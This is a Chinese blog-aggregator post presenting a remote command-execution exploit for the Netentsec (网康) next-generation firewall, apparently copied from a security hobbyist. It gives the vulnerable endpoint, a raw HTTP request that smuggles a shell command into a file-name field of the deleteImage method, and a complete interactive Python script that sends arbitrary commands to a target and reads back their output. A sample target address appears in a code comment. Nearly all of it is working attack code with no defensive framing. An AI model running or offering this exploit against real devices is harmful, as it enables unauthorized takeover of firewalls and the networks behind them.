热门标签
热门文章
- 1Session,Application,cookie的区别_application对象、session对象和cookie对象都是保存数据,但三者有什么区别?
- 2百人畅玩,秒级开服:用华为云搭建《幻兽帕鲁》服务器就是不一样
- 3ESXI8.0下Ubuntu 20.04LTS安装VMTools_vmware tools 未由 vsphere 管理
- 4新手3分钟自动化搞定腾讯云《幻兽帕鲁》游戏服务器
- 5八大排序算法之快速排序(上篇)(未经优化的快排)_非优化排序
- 614 rtsp视频服务 基于 RTSPtoWeb 来转换为前端可用的服务
- 7C# Fleck实现websocket_c# fleck websocket 客户端
- 8python_scapy实现ARP扫描_scapy arp reply
- 9AttributeError: module ‘numpy‘ has no attribute ‘typeDict‘_attributeerror: module 'numpy' has no attribute 't
- 10CV 经典主干网络 (Backbone) 系列: CSPNet
当前位置: article > 正文
网康下一代防火墙 命令执行_/directdata/direct/router
作者:菜鸟追梦旅行 | 2024-02-27 06:37:27
赞
踩
/directdata/direct/router
网康下一代防火墙 命令执行
fofo搜索
漏洞路径
/directdata/direct/router
- 1
漏洞数据包
POST /directdata/direct/router HTTP/1.1
Host: 192.168.1.86
Connection: close
Content-Length: 160
Upgrade-Insecure-Requests: 1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
python脚本
# -*- coding -*- #网康下一代防火墙 命令执行 #https://183.203.214.146 import requests requests.packages.urllib3.disable_warnings() import sys,colorama from colorama import * init(autoreset=True) def title(): print(colorama.Fore.GREEN + '+-------------------------------------------------------------+') print(colorama.Fore.GREEN +'+ 网康下一代防火墙 命令执行 + RCE +') print(colorama.Fore.GREEN +'+-------------------------------------------------------------+') print(colorama.Fore.GREEN +'+ EXP: python3 wangkangFirewall.py https://1.1.1.1:8443 +') print(colorama.Fore.GREEN +'+-------------------------------------------------------------+') print(colorama.Fore.GREEN +'+ 请输入url-格式为:https://xx.xx.xx.xx +') def cmd(urllist,cmdsr): url = urllist+'/directdata/direct/router' data = {"action": "SSLVPN_Resource", "data": [{"data": ["/var/www/html/d.txt;%s >/var/www/html/test.txt" % cmdsr]}], "f8839p7rqtj": "=", "method": "deleteImage", "tid": 17, "type": "rpc"} cmdlist = requests.post(url=url,json=data,verify=False) urlshow = urllist+'/test.txt' cmdshow = requests.get(url=urlshow,verify=False) cmdshowlist = cmdshow.text if len(cmdshowlist) == 0: print(colorama.Fore.YELLOW +'未读取到信息,请检查命令是否输入正确') print('------------------------------执行结果----------------------------------\n') print(colorama.Fore.RED +'{} '.format(cmdshow.text)) print('------------------------------------------------------------------------\n') print(colorama.Fore.GREEN +'+ 输入下条需要执行的命令--退出输入Q: +') jhlist = input('') if jhlist == 'Q': pass else: cmd(urllist,jhlist) if __name__ == '__main__': #print('------------------------------------------------------------------------\n') title() url = input(' ') print(colorama.Fore.YELLOW +'------------------------------------------------------------------------\n') print(colorama.Fore.GREEN +'+ 输入需要执行的命令 +') cmds = input('') print(colorama.Fore.YELLOW +'------------------------------------------------------------------------\n') cmd(url,cmds)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/150773?site
推荐阅读
- 相关标签
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。
